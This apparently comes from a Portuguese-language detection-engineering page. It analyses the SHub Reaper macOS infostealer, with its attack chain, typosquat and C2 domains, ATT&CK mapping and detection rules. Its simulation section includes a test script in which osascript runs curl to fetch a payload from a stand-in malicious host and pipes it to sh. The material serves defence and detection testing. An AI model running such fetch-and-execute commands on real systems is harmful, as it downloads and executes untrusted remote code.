SHub Reaper | Ladrão de macOS Engana Apple, Google e Microsoft em uma Única Cadeia de Ataque
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório analisa uma nova variante de infostealer do macOS chamada SHub Reaper, que utiliza instaladores falsos do WeChat e Miro para entregar uma carga útil maliciosa do AppleScript através de um domínio temático da Microsoft com erros tipográficos. Uma vez lançado no Editor de Scripts, a carga coleta dados do navegador, arquivos da carteira de criptomoedas e informações do keychain, e depois exfiltra o conteúdo roubado como arquivos ZIP fragmentados. O malware também interfere nos arquivos da carteira e estabelece persistência através de um LaunchAgent disfarçado como uma atualização de software do Google. Recomenda-se que a detecção se concentre na execução do AppleScript, na criação suspeita de LaunchAgent e no tráfego de saída para a infraestrutura de comando e controle conhecida.
Investigação
O SentinelOne rastreou toda a cadeia de entrega em várias etapas, incluindo o abuso do esquema applescript:// , a geração dinâmica da carga do AppleScript e um módulo de captura de arquivos que espelha o comportamento de roubo de documentos visto no AMOS. Os pesquisadores capturaram o tráfego de rede para o domínio de comando e controle hebsbsbzjsjshduxbs.xyz e endpoints relacionados, juntamente com a criação de arquivos temporários em /tmp e um LaunchAgent colocado no diretório da Biblioteca do usuário. A investigação também revelou funcionalidade embutida de bot Telegram usada para telemetria do operador.
Mitigação
Os defensores devem bloquear o acesso aos domínios com erros tipográficos mlcrosoft.co.com, qq-0732gwh22.com, e mlroweb.com, e monitorar os LaunchAgents criados em caminhos que imitam componentes de atualização do Google. Deve-se usar a lista de permissões de aplicativos para restringir a execução do AppleScript a partir de fontes não confiáveis e a verificação rigorosa de assinatura de código deve ser aplicada. As detecções de rede também devem alertar sobre a comunicação com o domínio de comando e controle identificado e seus caminhos de API conhecidos.
Resposta
Se a atividade do SHub Reaper for detectada, isole imediatamente o ponto final afetado, encerre quaisquer processos suspeitos de AppleScript ou LaunchAgent, e remova os arquivos maliciosos de /tmp e da Biblioteca do usuário. Os investigadores devem então realizar a coleta forense completa dos repositórios de dados do navegador, diretórios de carteiras e repositórios de credenciais, seguidos por redefinições de credenciais onde houver suspeita de comprometimento. A infraestrutura de comando e controle identificada deve ser bloqueada, e a equipe de resposta a incidentes deve iniciar buscas de ameaças mais amplas em todo o ambiente.
graph TB %% Definições de classes classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef operator fill:#ff9900 %% Nós – Etapas do ataque step_initial_access[“<b>Técnica</b> – <b>T1659 Injeção de Conteúdo</b>: Sites isca comprometidos (WeChat ou Miro falsos) hospedam URLs maliciosas applescript:// que entregam a carga útil”] class step_initial_access action step_execution[“<b>Técnica</b> – <b>T1027 Arquivos ou Informações Ofuscadas</b>: AppleScript aberto no Script Editor executa uma chamada curl oculta codificada em base64 que decodifica e executa o stager”] class step_execution action step_code_retrieval[“<b>Técnica</b> – <b>T1505 Componente de Software do Servidor</b>: AppleScript baixa o AppleScript malicioso principal de um servidor remoto”] class step_code_retrieval action step_credential_capture[“<b>Técnica</b> – <b>T1056 Captura de Entrada</b>: AppleScript solicita ao usuário uma senha e coleta dados do Keychain”] class step_credential_capture action step_data_collection[“<b>Técnica</b> – <b>T1074.001 Preparação Local de Dados</b>: Filegrabber examina Desktop e Documents em busca de extensões alvo e as prepara em /tmp/shub_<rand>”] class step_data_collection action step_archive[“<b>Técnica</b> – <b>T1560.001 Arquivamento via Utilitário</b>: Os arquivos coletados são compactados e divididos em partes de 70 MB”] class step_archive action step_exfiltration[“<b>Técnica</b> – <b>T1011 Exfiltração por Outro Meio de Rede</b>: As partes são enviadas via HTTPS para o servidor de comando e controle”] class step_exfiltration action step_wallet_hijack[“<b>Técnicas</b> – <b>T1553.002 Assinatura de Código</b> e <b>T1036.001 Mascaramento</b>: Arquivos app.asar maliciosos substituem binários legítimos de carteiras, usando assinaturas ad-hoc ou inválidas para contornar o Gatekeeper”] class step_wallet_hijack action step_persistence[“<b>Técnicas</b> – <b>T1037.002 Login Hook</b>, <b>T1176 Extensões de Software</b> e <b>T1574.007 Interceptação de Caminho</b>: Diretório falso Google Software Update com um plist LaunchAgent (com.google.keystone.agent.plist) colocado no PATH para obter execução persistente”] class step_persistence action step_backdoor[“<b>Técnica</b> – <b>T1219 Ferramentas de Acesso Remoto</b>: LaunchAgent executa o script GoogleUpdate a cada 60 s, envia beacon para /api/bot/heartbeat e pode executar comandos adicionais”] class step_backdoor malware %% Nós – Ferramentas / Componentes tool_applescript[“<b>Ferramenta</b> – <b>Nome</b>: AppleScript<br/><b>Descrição</b>: Script executado via Script Editor para decodificar e iniciar a carga útil”] class tool_applescript tool tool_curl[“<b>Ferramenta</b> – <b>Nome</b>: curl<br/><b>Descrição</b>: Usado para baixar AppleScript adicional e arquivos de dados via HTTPS”] class tool_curl tool tool_launchagent[“<b>Ferramenta</b> – <b>Nome</b>: LaunchAgent<br/><b>Descrição</b>: Mecanismo de persistência em nível de usuário do macOS definido por um plist”] class tool_launchagent tool malware_stager[“<b>Malware</b> – <b>Nome</b>: Stager<br/><b>Descrição</b>: Pequeno carregador que busca a carga útil principal do AppleScript”] class malware_stager malware %% Arestas – Fluxo step_initial_access –>|leva a| step_execution step_execution –>|usa| tool_applescript step_execution –>|executa| malware_stager malware_stager –>|baixa via| tool_curl malware_stager –>|aciona| step_code_retrieval step_code_retrieval –>|usa| tool_curl step_code_retrieval –>|habilita| step_credential_capture step_credential_capture –>|captura| step_data_collection step_data_collection –>|prepara arquivos para| step_archive step_archive –>|cria partes para| step_exfiltration step_exfiltration –>|entrega para| step_wallet_hijack step_wallet_hijack –>|modifica| step_persistence step_persistence –>|instala| tool_launchagent tool_launchagent –>|fornece| step_backdoor step_backdoor –>|atua como| malware_stager %% Atribuições de classes class step_initial_access,step_execution,step_code_retrieval,step_credential_capture,step_data_collection,step_archive,step_exfiltration,step_wallet_hijack,step_persistence,step_backdoor action class tool_applescript,tool_curl,tool_launchagent tool class malware_stager,step_backdoor malware
Fluxo de Ataque
Detecções
Tentativa de Comunicação de Domínios de Pesquisa de IP Possível (via dns)
Ver
Assinatura de Código Forçada de Conjunto de Aplicativo Modificado (via cmdline)
Ver
Utilitário de Arquivo do MacOS Apontando para Diretório Suspeito (via cmdline)
Ver
Tentativa Suspeita de Execução de Curl [MacOS] (via cmdline)
Ver
Arquivo foi Criado na Pasta Temporária do MacOS (via file_event)
Ver
Manipulação Possível de Strings Codificadas em Base64 (via cmdline)
Ver
IOCs (HashSha256) para detectar: SHub Reaper | macOS Stealer Imita Apple, Google e Microsoft em uma Única Cadeia de Ataque
Ver
IOCs (HashMd5) para detectar: SHub Reaper | macOS Stealer Imita Apple, Google e Microsoft em uma Única Cadeia de Ataque
Ver
Detecção da Cadeia de Infecção do SHub Reaper Usando Domínios com Erros de Digitação e C2 [Servidor Web]
Ver
Detectar Execução de Malware SHub Reaper via AppleScript e Curl [Criação de Processo Linux]
Ver
Execução de Simulação
Pré-requisito: A Verificação Pré-voo de Telemetria e Linha de Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão ao diagnóstico incorreto.
-
Narrativa do Ataque e Comandos:
O atacante cria um script de linha única que utilizaosascriptpara executar um comando de shell. Dentro do AppleScript,fazer script de shellexecutacurlpara baixar um script de shell remoto (payload.sh) e o direciona diretamente parashpara execução. Como toda a cadeia está embutida em uma única invocação do AppleScript, o macOS registra um únicoprocess_creationevento cujo linha de comando contém ambososascriptandcurl, satisfazendo a regra de detecção. -
Script de Teste de Regressão:
#!/bin/bash # # Simula execução do SHub Reaper no macOS # Gera um único evento de criação de processo contendo tanto 'osascript' quanto 'curl' # MALICIOUS_URL="https://malicious.example.com/payload.sh" # Linha única: osascript executa um comando de shell que faz curl do payload e o executa osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh"" -
Comandos de Limpeza:
#!/bin/bash # # Limpa quaisquer artefatos criados pela simulação. # O payload é executado na memória e não escreve arquivos, mas garantimos que não existam processos remanescentes. # # Mate quaisquer processos 'sh' estranhos iniciados pelo teste (use com cautela em sistemas de produção) pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"